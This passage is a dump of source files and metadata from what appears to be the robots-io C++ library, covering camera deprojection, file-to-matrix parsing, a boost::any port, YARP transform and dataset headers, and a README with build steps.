"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Camera/CameraDeprojectionMatrix.h>\n\nusing namespace Eigen;\n\n\nMatrixXd RobotsIO::Camera::deprojection_matrix(const std::size_t& width, const std::size_t& height, const double& fx, const double& fy, const double& cx, const double& cy)\n{\n MatrixXd deprojection_matrix(3, width * height);\n\n std::size_t i = 0;\n for (std::size_t u = 0; u < width; u++)\n {\n for (std::size_t v = 0; v < height; v++)\n {\n deprojection_matrix(0, i) = (u - cx) / fx;\n deprojection_matrix(1, i) = (v - cy) / fy;\n deprojection_matrix(2, i) = 1.0;\n\n i++;\n }\n }\n\n return deprojection_matrix;\n}\n\n\nEigen::MatrixXd RobotsIO::Camera::deprojection_matrix(const CameraParameters& parameters)\n{\n return RobotsIO::Camera::deprojection_matrix(parameters.width(), parameters.height(), parameters.fx(), parameters.fy(), parameters.cx(), parameters.cy());\n}\n"
},
{
"alpha_fraction": 0.5193798542022705,
"alphanum_fraction": 0.5229328274726868,
"avg_line_length": 30.272727966308594,
"blob_id": "0ae15e28144706e1862f3ec4ddd4088276196b9b",
"content_id": "6d70dcfccb595822d41dc9fed1deaa39b4d78a1a",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3096,
"license_type": "permissive",
"max_line_length": 186,
"num_lines": 99,
"path": "/src/RobotsIO/src/Utils/FileToEigen.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/FileToEigen.h>\n\n#include <iostream>\n#include <fstream>\n#include <vector>\n\nusing namespace Eigen;\n\n\nstd::pair<bool, Eigen::MatrixXd> RobotsIO::Utils::file_to_eigen(const std::string& file_path, const std::size_t& skip_rows, const std::size_t skip_cols, const std::size_t& expected_cols)\n{\n MatrixXd data;\n\n std::ifstream istrm(file_path);\n if (!istrm.is_open())\n {\n std::cerr << \"RobotsIO::Utils::file_to_eigen. Error: failed to open \" << file_path << std::endl;\n\n return std::make_pair(false, MatrixXd());\n }\n\n std::vector<std::string> istrm_strings;\n std::string line;\n {\n std::size_t rows = -1;\n while (std::getline(istrm, line))\n {\n rows++;\n\n if (rows < skip_rows)\n continue;\n\n istrm_strings.push_back(line);\n }\n }\n\n istrm.close();\n\n data.resize(expected_cols, istrm_strings.size());\n std::size_t found_lines = 0;\n for (auto line : istrm_strings)\n {\n std::size_t cols = -1;\n std::size_t found_fields = 0;\n std::string number_str;\n std::istringstream iss(line);\n\n while (iss >> number_str)\n {\n cols++;\n\n if (cols < skip_cols)\n continue;\n\n if ((found_fields + 1) > expected_cols)\n {\n std::cerr << \"RobotsIO::Utils::file_to_eigen. Error: malformed input file \" << file_path << \".\" << std::endl\n << \"Detailed error: found more columns (\" << found_fields + 1 << \") than expected (\" << expected_cols << \").\" << std::endl;\n\n return std::make_pair(false, MatrixXd());\n }\n\n try\n {\n std::size_t index = (expected_cols * found_lines) + found_fields;\n *(data.data() + index) = std::stod(number_str);\n }\n catch (std::invalid_argument)\n {\n std::cerr << \"RobotsIO::Utils::file_to_eigen. Error: malformed input file \" << file_path << \".\" << std::endl\n << \"Detailed error: data cannot be interpreted as double \"\n << \"at line \" + std::to_string(skip_cols + found_lines) << \", \"\n << \"token \" + std::to_string(found_fields) << std::endl;\n\n return std::make_pair(false, MatrixXd());\n }\n\n found_fields++;\n }\n\n if (found_fields != expected_cols)\n {\n std::cerr << \"RobotsIO::Utils::read_data_from_file. Error: malformed input file \" << file_path << std::endl\n << \"Detailed error: found less columns (\" << found_fields << \") than expected (\" << expected_cols << \").\" << std::endl;\n\n return std::make_pair(false, MatrixXd());\n }\n found_lines++;\n }\n\n return std::make_pair(true, data);\n}\n"
},
{
"alpha_fraction": 0.6572591066360474,
"alphanum_fraction": 0.6635789275169373,
"avg_line_length": 27.73383140563965,
"blob_id": "e21d6f9fabafd3e39cd7dbed544fa02598c7c724",
"content_id": "9f7dbffbb82d53fa5b1d9c81ece44fc428bb0210",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 11551,
"license_type": "permissive",
"max_line_length": 173,
"num_lines": 402,
"path": "/src/RobotsIO/include/RobotsIO/Utils/any.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/**\n * Port of boost::any for C++11 compilers.\n * Changed namespace from boost:: to RobotsIO::Utils::any for the sake of project conventions.\n *\n * See http://www.boost.org/libs/any for Documentation.\n *\n * See also:\n * + http://en.cppreference.com/w/cpp/any\n * + http://en.cppreference.com/w/cpp/experimental/any\n * + http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2015/n4562.html#any\n * + https://cplusplus.github.io/LWG/lwg-active.html#2509\n *\n * Copyright Kevlin Henney, 2000, 2001, 2002. All rights reserved.\n * Copyright Claudio Fantacci, 2018. All rights reserved.\n *\n * What: Variant type boost::any.\n * Who: Contributed by Kevlin Henney,\n * with features contributed and bugs found by Antony Polukhin, Ed Brey,\n * Mark Rodgers, Peter Dimov and James Curran,\n * with C++11 compiler port by Claudio Fantacci.\n * When: July 2001, April 2013 - May 2013, September 2018.\n *\n * Distributed under the Boost Software License, Version 1.0.\n * See the following license or copy at http://www.boost.org/LICENSE_1_0.txt\n *\n * Boost Software License - Version 1.0 - August 17th, 2003\n *\n * Permission is hereby granted, free of charge, to any person or organization\n * obtaining a copy of the software and accompanying documentation covered by\n * this license (the \"Software\") to use, reproduce, display, distribute,\n * execute, and transmit the Software, and to prepare derivative works of the\n * Software, and to permit third-parties to whom the Software is furnished to\n * do so, all subject to the following:\n *\n * The copyright notices in the Software and this entire statement, including\n * the above license grant, this restriction and the following disclaimer,\n * must be included in all copies of the Software, in whole or in part, and\n * all derivative works of the Software, unless such copies or derivative\n * works are solely in the form of machine-executable object code generated by\n * a source language processor.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, TITLE AND NON-INFRINGEMENT. IN NO EVENT\n * SHALL THE COPYRIGHT HOLDERS OR ANYONE DISTRIBUTING THE SOFTWARE BE LIABLE\n * FOR ANY DAMAGES OR OTHER LIABILITY, WHETHER IN CONTRACT, TORT OR OTHERWISE,\n * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n * DEALINGS IN THE SOFTWARE.\n */\n\n#ifndef ROBOTSIO_ANY_H\n#define ROBOTSIO_ANY_H\n\n#include <algorithm>\n#include <memory>\n#include <stdexcept>\n#include <typeinfo>\n#include <type_traits>\n\n\nnamespace RobotsIO\n{\nnamespace Utils\n{\n\n/**\n * The class any describes a type-safe container for single values of any type.\n * An object of class any stores an instance of any type that satisfies the\n * constructor requirements or is empty, and this is referred to as the state\n * of the class any object. The stored instance is called the contained object.\n * Two states are equivalent if they are either both empty or if both are not\n * empty and if the contained objects are equivalent.\n * The non-member any_cast functions provide type-safe access to the contained object.\n */\nclass any\n{\npublic:\n /**\n * Constructs an empty object.\n */\n any() noexcept :\n content(0)\n { }\n\n\n /**\n * Copies content of other into a new instance, so that any content is equivalent\n * in both type and value to those of other prior to the constructor call,\n * or empty if other is empty.\n */\n any(const any& other) :\n content(other.content ? other.content->clone() : 0)\n { }\n\n\n /**\n * Moves content of other into a new instance, so that any content is equivalent\n * in both type and value to those of other prior to the constructor call,\n * or empty if other is empty.\n */\n any(any&& other) noexcept :\n content(other.content)\n {\n other.content = 0;\n }\n\n\n /**\n * Constructs an object with initial content an object of type std::decay_t<ValueType>,\n * direct-initialized from std::forward<ValueType>(value). If\n * std::is_copy_constructible<std::decay_t<ValueType>>::value is false, the program is ill-formed.\n */\n template<typename ValueType>\n any(const ValueType& value) :\n content(new holder<typename std::remove_cv<typename std::decay<const ValueType>::type>::type>(value))\n { }\n\n\n /**\n * Constructs an object with initial content an object of type std::decay_t<ValueType>,\n * direct-initialized from std::forward<ValueType>(value). If\n * std::is_copy_constructible<std::decay_t<ValueType>>::value is false, the program is ill-formed.\n */\n template<typename ValueType>\n any(ValueType&& value, typename std::enable_if<!std::is_same<any&, ValueType>::value>::type* = 0, typename std::enable_if<!std::is_const<ValueType>::value>::type* = 0) :\n content(new holder<typename std::decay<ValueType>::type>(static_cast<ValueType&&>(value)))\n { }\n\n\n /**\n * Destruct the object.\n */\n ~any() noexcept\n {\n delete content;\n }\n\n\n /**\n * Assigns contents to the contained value.\n * Assigns by copying the state of rhs, as if by any(rhs).swap(*this).\n *\n * @param rhs object whose contained value to assign\n */\n any& operator=(const any& rhs)\n {\n any(rhs).swap(*this);\n return *this;\n }\n\n\n /**\n * Assigns contents to the contained value.\n * Assigns by moving the state of rhs, as if by any(std::move(rhs)).swap(*this).\n * rhs is left in a valid but unspecified state after the assignment.\n *\n * @param rhs object whose contained value to assign\n */\n any& operator=(any&& rhs) noexcept\n {\n rhs.swap(*this);\n any().swap(rhs);\n return *this;\n }\n\n\n /**\n * Assigns contents to the contained value.\n * Assigns the type and value of rhs, as if by any(std::forward<ValueType>(rhs)).swap(*this).\n * This overload only participates in overload resolution if std::decay_t<ValueType> is not\n * the same type as any and std::is_copy_constructible_v<std::decay_t<ValueType>> is true.\n *\n * @param rhs object whose contained value to assign\n */\n template <class ValueType>\n any& operator=(ValueType&& rhs)\n {\n any(static_cast<ValueType&&>(rhs)).swap(*this);\n return *this;\n }\n\n\n /**\n * If not empty, destroys the contained object.\n */\n void reset() noexcept\n {\n any().swap(*this);\n }\n\n\n /**\n * Swaps the content of two any objects.\n *\n * @param other object to swap with\n */\n any& swap(any& rhs) noexcept\n {\n std::swap(content, rhs.content);\n return *this;\n }\n\n /**\n * Checks whether the object contains a value.\n *\n * @return true if instance contains a value, otherwise false.\n */\n bool has_value() const noexcept\n {\n return content;\n }\n\n\n /**\n * Queries the contained type.\n *\n * The typeid of the contained value if instance is non-empty, otherwise typeid(void).\n */\n const std::type_info& type() const noexcept\n {\n return content ? content->type() : typeid(void);\n }\n\n\nprivate:\n class placeholder\n {\n public:\n virtual ~placeholder()\n { }\n\n public:\n virtual const std::type_info& type() const noexcept = 0;\n\n virtual placeholder* clone() const = 0;\n\n };\n\n\n template<typename ValueType>\n class holder : public placeholder\n {\n public:\n holder(const ValueType& value) :\n held(value)\n { }\n\n\n holder(ValueType&& value) :\n held(static_cast<ValueType&&>(value))\n { }\n\n\n virtual const std::type_info& type() const noexcept\n {\n return typeid(ValueType);\n }\n\n\n virtual placeholder* clone() const\n {\n return new holder(held);\n }\n\n\n ValueType held;\n\n private:\n holder& operator=(const holder &);\n };\n\n\nprivate:\n template<typename ValueType>\n friend ValueType* any_cast(any*) noexcept;\n\n placeholder* content;\n};\n\n\n/**\n * Overloads the std::swap algorithm for std::any. Swaps the content of two any objects by calling lhs.swap(rhs).\n *\n * @param lhs objects to swap\n * @param rhs objects to swap\n */\ninline void swap(any& lhs, any& rhs) noexcept\n{\n lhs.swap(rhs);\n}\n\n\n/**\n * Defines a type of object to be thrown by the value-returning forms of blf::any::any_cast on failure.\n */\nclass bad_any_cast : public std::bad_cast\n{\npublic:\n /**\n * Returns the explanatory string.\n *\n * Pointer to a null-terminated string with explanatory information. The pointer is guaranteed to be\n * valid at least until the exception object from which it is obtained is destroyed, or until a\n * non-const member function on the exception object is called.\n */\n virtual const char* what() const noexcept override\n {\n return \"bad any_cast\";\n }\n};\n\n\n/**\n * Performs type-safe access to the contained object.\n *\n * Throws blf::any::bad_any_cast if the typeid of the requested\n * ValueType does not match that of the contents of operand.\n *\n * @param operand target any object\n */\ntemplate<typename ValueType>\nValueType* any_cast(any* operand) noexcept\n{\n return operand && operand->type() == typeid(ValueType) ? std::addressof(static_cast<any::holder<typename std::remove_cv<ValueType>::type>*>(operand->content)->held) : 0;\n}\n\n\n/**\n * Performs type-safe access to the contained object.\n *\n * Throws blf::any::bad_any_cast if the typeid of the requested\n * ValueType does not match that of the contents of operand.\n *\n * @param operand target any object\n */\ntemplate<typename ValueType>\ninline const ValueType* any_cast(const any* operand) noexcept\n{\n return any_cast<ValueType>(const_cast<any*>(operand));\n}\n\n\n/**\n * Performs type-safe access to the contained object.\n *\n * Throws blf::any::bad_any_cast if the typeid of the requested\n * ValueType does not match that of the contents of operand.\n *\n * @param operand target any object\n */\ntemplate<typename ValueType>\nValueType any_cast(any& operand)\n{\n typedef typename std::remove_reference<ValueType>::type nonref;\n\n nonref* result = any_cast<nonref>(std::addressof(operand));\n if(!result)\n throw bad_any_cast();\n\n typedef typename std::conditional<std::is_reference<ValueType>::value, ValueType, typename std::add_lvalue_reference<ValueType>::type>::type ref_type;\n\n return static_cast<ref_type>(*result);\n}\n\n\n/**\n * Performs type-safe access to the contained object.\n *\n * Throws blf::any::bad_any_cast if the typeid of the requested\n * ValueType does not match that of the contents of operand.\n *\n * @param operand target any object\n */\ntemplate<typename ValueType>\ninline ValueType any_cast(const any& operand)\n{\n typedef typename std::remove_reference<ValueType>::type nonref;\n return any_cast<const nonref&>(const_cast<any&>(operand));\n}\n\n\n/**\n * Performs type-safe access to the contained object.\n *\n * Throws blf::any::bad_any_cast if the typeid of the requested\n * ValueType does not match that of the contents of operand.\n *\n * @param operand target any object\n */\ntemplate<typename ValueType>\ninline ValueType any_cast(any&& operand)\n{\n static_assert(std::is_rvalue_reference<ValueType&&>::value || std::is_const<typename std::remove_reference<ValueType>::type>::value,\n \"any_cast shall not be used for getting nonconst references to temporary objects\");\n\n return any_cast<ValueType>(operand);\n}\n\n}\n}\n\n#endif /* ROBOTSIO_ANY_H */\n"
},
{
"alpha_fraction": 0.7312806248664856,
"alphanum_fraction": 0.7361791729927063,
"avg_line_length": 24.070175170898438,
"blob_id": "7cbfd773e6cda1017d04543eac94303669ef7385",
"content_id": "2a58830d16f0a99de684abb5bfea460811648682",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1429,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 57,
"path": "/src/RobotsIO/include/RobotsIO/Utils/TransformYarpTransformClient.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_TRANSFORMYARPTRANSFORMCLIENT_H\n#define ROBOTSIO_TRANSFORMYARPTRANSFORMCLIENTR_H\n\n#include <RobotsIO/Utils/Transform.h>\n\n#include <Eigen/Dense>\n\n#include <string>\n\n#include <yarp/dev/PolyDriver.h>\n#include <yarp/dev/IFrameTransform.h>\n#include <yarp/os/Network.h>\n\nnamespace RobotsIO {\n namespace Utils {\n class TransformYarpTransformClient;\n }\n}\n\n\nclass RobotsIO::Utils::TransformYarpTransformClient : public RobotsIO::Utils::Transform\n{\npublic:\n EIGEN_MAKE_ALIGNED_OPERATOR_NEW\n\n TransformYarpTransformClient(const std::string& port_prefix, const std::string& source_name, const std::string& target_name);\n\n virtual ~TransformYarpTransformClient();\n\n Eigen::Transform<double, 3, Eigen::Affine> transform() override;\n\n bool freeze(const bool blocking = false) override;\n\nprivate:\n yarp::os::Network yarp_;\n\n yarp::dev::PolyDriver drv_transform_client_;\n\n yarp::dev::IFrameTransform* transform_client_;\n\n Eigen::Transform<double, 3, Eigen::Affine> transform_;\n\n const std::string source_name_;\n\n const std::string target_name_;\n\n const std::string log_name_ = \"TransformYarpTransformClient\";\n};\n\n#endif /* ROBOTSIO_TRANSFORMYARPTRANSFORMCLIENT_H */\n"
},
{
"alpha_fraction": 0.7056242227554321,
"alphanum_fraction": 0.7084164619445801,
"avg_line_length": 29.573171615600586,
"blob_id": "064084d7bffffaeb43171406c1ef58840a5011f9",
"content_id": "4340dbf20da9da4cbb38b8054132ab8281fcaea2",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2507,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 82,
"path": "/src/RobotsIO/include/RobotsIO/Utils/TransformYarpPort.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_TRANSFORMYARPPORT_H\n#define ROBOTSIO_TRANSFORMYARPPORT_H\n\n#include <RobotsIO/Utils/Transform.h>\n#include <RobotsIO/Utils/YarpBufferedPort.hpp>\n#include <RobotsIO/Utils/YarpImageOfMonoFloat.h>\n\n#include <yarp/sig/Image.h>\n#include <yarp/sig/Vector.h>\n\n#include <Eigen/Dense>\n\nnamespace RobotsIO {\n namespace Utils {\n class TransformYarpPort;\n }\n}\n\nclass RobotsIO::Utils::TransformYarpPort : public RobotsIO::Utils::Transform,\n public RobotsIO::Utils::YarpBufferedPort<yarp::sig::Vector>\n{\npublic:\n EIGEN_MAKE_ALIGNED_OPERATOR_NEW\n\n /**\n * Initialize a Transform instance which uses YARP ports to receive transforms and\n * (optionally) provide RGB images, or Depth + Segmentation, to the module which extract transforms.\n *\n * Required port names are composed as <port_prefix>/transform:i, <port_prefix>/rgb:o\n * and <port_prefix>/depth_segmentation:o.\n */\n TransformYarpPort(const std::string& port_prefix, const bool& provide_rgb, const bool& provide_depth_segmentation);\n\n virtual ~TransformYarpPort();\n\n Eigen::Transform<double, 3, Eigen::Affine> transform() override;\n\n Eigen::MatrixXd bounding_box() override;\n\n bool freeze(const bool blocking = false) override;\n\n int get_frames_between_iterations() const override;\n\n void set_rgb_image(const cv::Mat& image) override;\n\n void set_depth_segmentation_image(const Eigen::MatrixXf& depth, const cv::Mat& segmentation) override;\n\n bool transform_received() override;\n\nprivate:\n Eigen::Transform<double, 3, Eigen::Affine> transform_;\n\n Eigen::MatrixXd bbox_points_;\n\n RobotsIO::Utils::YarpBufferedPort<yarp::sig::ImageOf<yarp::sig::PixelRgb>> rgb_out_;\n\n RobotsIO::Utils::YarpBufferedPort<RobotsIO::Utils::YarpImageOfMonoFloat> depth_segmentation_out_;\n\n const bool provide_rgb_;\n\n const bool provide_depth_segmentation_;\n\n cv::Mat cv_rgb_out_;\n yarp::sig::ImageOf<yarp::sig::PixelRgb> yarp_rgb_out_;\n\n cv::Mat cv_depth_out_;\n cv::Mat cv_segmentation_out_;\n RobotsIO::Utils::YarpImageOfMonoFloat yarp_depth_segmentation_out_;\n\n bool transform_received_ = false;\n\n const std::string log_name_ = \"RobotsIO::Utils::TransformYarpPort\";\n};\n\n#endif /* ROBOTSIO_TRANSFORMYARPPORT_H */\n"
},
{
"alpha_fraction": 0.7132818102836609,
"alphanum_fraction": 0.7167955040931702,
"avg_line_length": 27.459999084472656,
"blob_id": "1c39a2c5688efad9646dfc5944daf12361c7e8c3",
"content_id": "796d2a23c07e9294b2fd9f234e69904be4f61b84",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1423,
"license_type": "permissive",
"max_line_length": 301,
"num_lines": 50,
"path": "/src/RobotsIO/include/RobotsIO/Utils/DatasetSpatialVelocity.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_DATASETSPATIALVELOCITY_H\n#define ROBOTSIO_DATASETSPATIALVELOCITY_H\n\n#include <Eigen/Dense>\n\n#include <RobotsIO/Utils/DatasetDataStream.h>\n#include <RobotsIO/Utils/SpatialVelocity.h>\n\nnamespace RobotsIO {\n namespace Utils {\n class DatasetSpatialVelocity;\n }\n}\n\n\nclass RobotsIO::Utils::DatasetSpatialVelocity : public RobotsIO::Utils::DatasetDataStream,\n public RobotsIO::Utils::SpatialVelocity\n{\npublic:\n DatasetSpatialVelocity(const std::string& file_path, const std::size_t& skip_rows, const std::size_t& skip_cols, const std::size_t& expected_cols, const int rx_time_index = RobotsIO::Utils::DatasetDataStream::NoTimeIndex, const int tx_time_index = RobotsIO::Utils::DatasetDataStream::NoTimeIndex);\n\n virtual ~DatasetSpatialVelocity();\n\n bool freeze(const bool blocking = false) override;\n\n double elapsed_time() override;\n\nprotected:\n Eigen::VectorXd twist() override;\n\nprivate:\n double last_time_;\n\n double elapsed_time_;\n\n bool last_time_initialized_ = false;\n\n Eigen::VectorXd twist_;\n\n const std::string log_name_ = \"DatasetSpatialVelocity\";\n};\n\n#endif /* ROBOTSIO_DATASETSPATIALVELOCITY_H */\n"
},
{
"alpha_fraction": 0.687083899974823,
"alphanum_fraction": 0.6937416791915894,
"avg_line_length": 18.763158798217773,
"blob_id": "4d2abc446b2f7cbe624e553b826c3af7f6750cdd",
"content_id": "697417db3ce862295fbc7286ab55a2c04122a8d2",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 751,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 38,
"path": "/src/RobotsIO/include/RobotsIO/Utils/ClockYarp.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_CLOCKYARP_H\n#define ROBOTSIO_CLOCKYARP_H\n\n#include <RobotsIO/Utils/Clock.h>\n\n#include <yarp/os/Network.h>\n\nnamespace RobotsIO {\n namespace Utils {\n class ClockYarp;\n }\n}\n\nclass RobotsIO::Utils::ClockYarp : public RobotsIO::Utils::Clock\n{\npublic:\n ClockYarp();\n\n virtual ~ClockYarp();\n\n double now() const override;\n\n void delay(const int& milliseconds) const override;\n\nprivate:\n yarp::os::Network yarp_;\n\n const std::string log_name_ = \"ClockYarp\";\n};\n\n#endif /* ROBOTSIO_CLOCKYARP_H */\n"
},
{
"alpha_fraction": 0.7110228538513184,
"alphanum_fraction": 0.7159880995750427,
"avg_line_length": 24.820512771606445,
"blob_id": "e6938063f107b46ac1c87e5025b9f8e0232324bf",
"content_id": "64c8ad0631a7d7118d3e64b380146343360dd32a",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1007,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 39,
"path": "/README.md",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "# RobotsIO\n\nSmall C++ library to ease access to some devices of a robot using standard\nformats from `Eigen` and `OpenCV`.\n\n\n\n### Browsable API\n\n- [RobotsIO](https://xenvre.github.io/robots-io/docs/html/annotated.html)\n\n### Dependencies\n\n- [`Eigen 3`](http://eigen.tuxfamily.org/index.php?title=Main_Page)\n- [`OpenCV`](https://opencv.org/)\n\n#### Optional\nIf the following are enabled, some functionalities related to the iCub robot and/or YARP are also available.\n\n- [`ICUB`](https://github.com/robotology/icub-main)\n- [`YARP`](https://github.com/robotology/yarp)\n\n### Installation\n\n```\ngit clone https://github.com/xenvre/robots-io.git\ncd robots-io\nmkdir build\ncd build\ncmake -DCMAKE_PREFIX_PATH=<installation_path> [-DUSE_ICUB=ON] [-DUSE_YARP=ON] ../\nmake install\n```\n\nIn order to use the library within a `CMake` project\n```\nfind_package(RobotsIO REQUIRED)\n(...)\ntarget_link_libraries(... RobotsIO::RobotsIO ...)\n```\n"
},
{
"alpha_fraction": 0.7416595220565796,
"alphanum_fraction": 0.7459366917610168,
"avg_line_length": 28.9743595123291,
"blob_id": "886e3eeada340536653b6363a970e0fb6394b1b7",
"content_id": "6fbd879c2ab540daa1e23e1dd60d9bc037e51aca",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1169,
"license_type": "permissive",
"max_line_length": 315,
"num_lines": 39,
"path": "/src/RobotsIO/include/RobotsIO/Utils/DatasetDataStreamDelayed.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_DATASETDATASTREAMDELAYED_H\n#define ROBOTSIO_DATASETDATASTREAMDELAYED_H\n\n#include <RobotsIO/Utils/DatasetDataStream.h>\n\nnamespace RobotsIO {\n namespace Utils {\n class DatasetDataStreamDelayed;\n }\n}\n\n\nclass RobotsIO::Utils::DatasetDataStreamDelayed : public RobotsIO::Utils::DatasetDataStream\n{\npublic:\n DatasetDataStreamDelayed(const double& fps, const double& simulated_fps, const bool simulate_inference_time, const std::string& file_path, const std::size_t& skip_rows, const std::size_t& skip_cols, const std::size_t& expected_cols, const int rx_time_index = NoTimeIndex, const int tx_time_index = NoTimeIndex);\n\n virtual ~DatasetDataStreamDelayed();\n\n virtual Eigen::VectorXd data() override;\n\n bool freeze() override;\n\nprivate:\n const int delay_;\n\n const bool simulate_inference_time_;\n\n const std::string log_name_ = \"DatasetDataStreamDelayed\";\n};\n\n#endif /* ROBOTSIO_DATASETDATASTREAMDELAYED_H */\n"
},
{
"alpha_fraction": 0.7234886288642883,
"alphanum_fraction": 0.735381543636322,
"avg_line_length": 21.422222137451172,
"blob_id": "37a673457e6ac125b3b1443967295b85a4722b8d",
"content_id": "d0e7001ccc3a95f5e88b9835e387ab35b92b764a",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1009,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 45,
"path": "/src/RobotsIO/include/RobotsIO/Utils/TransformWithVelocity.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_TRANSFORMWITHVELOCITY_H\n#define ROBOTSIO_TRANSFORMWITHVELOCITY_H\n\n#include <RobotsIO/Utils/Transform.h>\n\n#include <Eigen/Dense>\n\nnamespace RobotsIO {\n namespace Utils {\n class TransformWithVelocity;\n\n struct TransformWithVelocityStorage;\n }\n}\n\nstruct RobotsIO::Utils::TransformWithVelocityStorage\n{\n EIGEN_MAKE_ALIGNED_OPERATOR_NEW\n\n Eigen::Transform<double, 3, Eigen::Affine> transform;\n\n Eigen::Vector3d linear_velocity;\n\n Eigen::Vector3d angular_velocity;\n};\n\n\nclass RobotsIO::Utils::TransformWithVelocity : public RobotsIO::Utils::Transform\n{\npublic:\n virtual ~TransformWithVelocity();\n\n virtual Eigen::Vector3d linear_velocity() = 0;\n\n virtual Eigen::Vector3d angular_velocity() = 0;\n};\n\n#endif /* ROBOTSIO_TRANSFORMWVELOCITY_H */\n"
},
{
"alpha_fraction": 0.7426273226737976,
"alphanum_fraction": 0.7459785342216492,
"avg_line_length": 26.629629135131836,
"blob_id": "d6f43ec072a7b42be2dac6a920d62918f4d536fc",
"content_id": "c19b3df551aa488ca030780ff01142b1a4548e7b",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1492,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 54,
"path": "/src/RobotsIO/include/RobotsIO/Camera/DatasetParameters.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_DATASETPARAMETERS_H\n#define ROBOTSIO_DATASETPARAMETERS_H\n\n#include <RobotsIO/Utils/Parameters.h>\n\n#include <string>\n\nnamespace RobotsIO {\n namespace Camera {\n struct DatasetParameters;\n }\n}\n\n\nclass RobotsIO::Camera::DatasetParameters : public RobotsIO::Utils::Parameters\n{\npublic:\n DatasetParameters();\n\n virtual ~DatasetParameters();\n\n robots_io_accessor(DatasetParameters);\n\n robots_io_declare_std_field(DatasetParameters, string, path);\n\n robots_io_declare_std_field(DatasetParameters, string, data_prefix);\n\n robots_io_declare_std_field(DatasetParameters, string, rgb_prefix);\n\n robots_io_declare_std_field(DatasetParameters, string, depth_prefix);\n\n robots_io_declare_std_field(DatasetParameters, string, data_format);\n\n robots_io_declare_std_field(DatasetParameters, string, rgb_format);\n\n robots_io_declare_std_field(DatasetParameters, string, depth_format);\n\n robots_io_declare_std_field(DatasetParameters, size_t, heading_zeros);\n\n robots_io_declare_std_field(DatasetParameters, size_t, index_offset);\n\n robots_io_declare_std_field(DatasetParameters, size_t, standard_data_offset);\n\n robots_io_declare_field(DatasetParameters, bool, data_available);\n};\n\n#endif /* ROBOTSIO_DATASETPARAMETERS_H */\n"
},
{
